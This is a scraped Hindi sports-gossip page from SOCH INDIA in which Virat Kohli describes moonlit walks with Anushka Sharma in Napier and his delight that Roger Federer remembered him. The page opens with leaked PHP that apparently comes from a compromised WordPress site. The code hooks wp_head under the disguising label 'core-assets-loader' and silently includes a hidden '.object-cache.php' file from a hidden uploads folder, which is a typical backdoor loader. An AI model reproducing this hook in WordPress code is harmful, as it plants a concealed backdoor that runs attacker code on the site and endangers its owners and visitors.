add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चांदनी रात में पत्नी अनुष्का के साथ बेंच पर बैठना पसंद है कप्तान कोहली को – SOCH INDIA
Menu

खेल
चांदनी रात में पत्नी अनुष्का के साथ बेंच पर बैठना पसंद है कप्तान कोहली को

nobanner

क्रिकेट के मैदान पर कामयाबी की नई परिभाषा गढ़ते जा रहे भारतीय क्रिकेट टीम के कप्तान विराट कोहली मैदान से बाहर छोटी छोटी चीजों में खुशियां तलाशते हैं. वह फिर चाहे पत्नी अनुष्का शर्मा के साथ चांदनी रात में बेंच पर बैठना हो या रोजर फेडरर से खेलों पर गप्पे लड़ाना हो. कोहली और बालीवुड अभिनेत्री उनकी पत्नी अनुष्का के लिये भारत में प्रशंसकों की बड़ी तादाद के चलते यह सब कर पाना मुमकिन नहीं है. न्यूजीलैंड जैसे खूबसूरत देश में वह अपनी पत्नी के साथ लंबे वाक पर जाने और कुदरत की खूबसूरती निहारने का पूरा मजा ले रहे हैं .

कोहली ने एक स्पोटर्स चैनल को दिये इंटरव्यू में कहा, ‘‘मैं और मेरी पत्नी आम चीजें करना पसंद करते हैं. जैसे कि लंबे वाक पर जाना.’’ उन्होंने कहा, ‘‘अगर हम नेपियर जैसी जगह पर हैं जो इतना खूबसूरत है तो एक रात हम मरीन परेड गए जहां बेंच पर बैठकर चांदनी रात का मजा लिया और बस बातें करते रहें.’’ उन्होंने कहा, ‘‘हमें छोटी छोटी चीजें मजा देती हैं क्योंकि हम हमेशा लोगों की नजरों में रहते हैं. हमें इस तरह के पल मिलते ही कहां है तो जब भी समय मिलता है, हम उसका पूरा लुत्फ उठाते हैं.’’

हाल ही में कोहली और अनुष्का आस्ट्रेलियाई ओपन में रोजर फेडरर से मिले और फेडरर को उनकी पिछली मुलाकात भी याद थी. कोहली ने कहा, ‘‘अद्भुत. मैं उनसे पहले भी मिला हूं लेकिन उन्होंने मुझे याद रखा. वाह.’’

भारतीय क्रिकेट टीम के कप्तान और स्टार बल्लेबाज कोहली ने कहा, ‘‘फेडरर ने बताया कि कुछ साल पहले एक अभ्यास मैच के दौरान मैं उनसे सिडनी में मिला था. मुझे लगा वाह उन्हें मैं याद हूं. मैं बयां नहीं कर सकता कि कितनी खुशी हुई. मैं बचपन से उन्हें खेलते देख रहा हूं. वह महान खिलाड़ी और इंसान हैं.’’